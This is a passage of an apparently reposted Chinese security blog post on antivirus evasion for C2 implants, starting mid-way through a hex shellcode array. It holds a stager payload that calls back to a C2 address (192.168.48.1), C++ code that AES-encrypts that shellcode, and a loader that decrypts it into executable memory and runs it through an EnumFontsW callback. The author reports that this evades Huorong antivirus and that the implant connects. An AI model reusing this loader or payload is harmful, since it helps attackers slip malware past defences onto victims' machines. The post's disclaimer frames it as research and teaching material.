8x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x29x20x4cx42x42x52x4fx57x53x45x52x0dx0ax00xd8x1dx49xcdx7cx67xd4x35x0axcdx0bx6fx43xb8x2dx58x61xd6x49x96xe8x8axc9x00xd6x78xbdxcex7exe8xe6xd3x0cx4fxe3x8axccx11x7bx4ex34xfdx8dxa4xf0xdex80x20x4ax98x17x3axd2xa4x8ax68xcex78xa7xb6xd7x46x52x70x9ex6axf9xcbx62xb9xa7xeaxafxd1xfax0cxb5x89x98x3dx58xe4x0cx7fxa0x0exb9x56x42x5cx82x89xd9x01x94xc2x4cxd9x8bx5bx53x9ex33x42x2fx4ex21xcexb4xa8x0bx14x91x95x65x8ax4bx68xeexe0x90xedxc5xa1x85x04x89x2exc0xa0x14x94xc1x60xb2x3axa3x36x17x6ex0axe8xa5xc8xe2x9cx42xcdx8ax2exf5xf6xbbx68x34x73xf7x9bx69x0cxf5x97xc8x4ax4ax59x44x63x43x2bx91xc9xa0x25x41xa2xdfx26x98xf9x53xbex1cxc8x6dxe8x24x34xd8x9ax72x21xf1x57xe2x81x9dx35x62x0bx91x3fx3dxa5x3ex83xb7x60x9ax20xd9xb7xa4x69x96x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex34x38x2ex31x00x00x0ax2cx2a";//生成随机16位的key值和iv值srand(time(0)); // initialize random seedstring g_key = random_string(16);string g_iv = random_string(16);cout << "key值: " << g_key << endl;cout << "iv值: " << g_iv <<endl;//将shellcode字节数组转换成十六进制字符串size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;string OriginalShellcode = toHexString(buf, bufLen);cout << "未加密的shellcode: " << OriginalShellcode << endl;//对shellcode字符串进行加密string EncryptShellcode = EncryptionAES(OriginalShellcode,g_key.c_str(),g_iv.c_str());cout << "加密后的shellcode: " << EncryptShellcode << endl;//对加密后的shellcode字符串进行解密string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());cout << "解密后的shellcode: " << DecryptShellcode << endl;return 0;}
https://github.com/xf555er/ShellcodeEncryption记录加密结果
3、改造刚才的“回调函数”加载器,加入解密代码进行改造
using namespace std;char g_key[17] = "OeQ)ph(:u#$_Rr<2"; //填写key密钥char g_iv[17] = "0(/IaOQ=>B&ETYDT"; //定义iv向量voidmain(int argc, char* argv[]){// 加密后的shellcode(省略中间部分,实际中保留)string buf = "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"; // 略去过长部分// 解密shellcodestring strbuf = DecryptionAES(buf, g_key, (char*)g_iv);// 将解密的shellcode转换为字节数组char* p = (char*)strbuf.c_str();unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));for (size_t i = 0; i < strbuf.length() / 2; i++) {sscanf(p, "%02x", &shellcode[i]);p += 2;}int ShellcodeSize = strbuf.length() / 2;printf("Decrypted buffer:n");for (int i = 0; i < ShellcodeSize; i++) {printf("\x%02x", shellcode[i]);}// 加载shellcodechar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);// 执行shellcodeEnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);}
测试,成功上线,代码没问题
打包编译出来,火绒不再查杀,可以正常上线!
免杀效果通常受多方面影响,没有哪一种技术或者手段能够通吃,通常需要多种手段结合才能最终实现免杀;其次,实战中面临的环境也不一样,不同的杀软效果也不一样,具体问题还需具体分析。本系列文章以技术的实现为主,仅拿火绒演示,以此表达一项技术的有效性。
原文始发于微信公众号(仇辉攻防):【免杀】C2免杀技术(三)shellcode加密
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论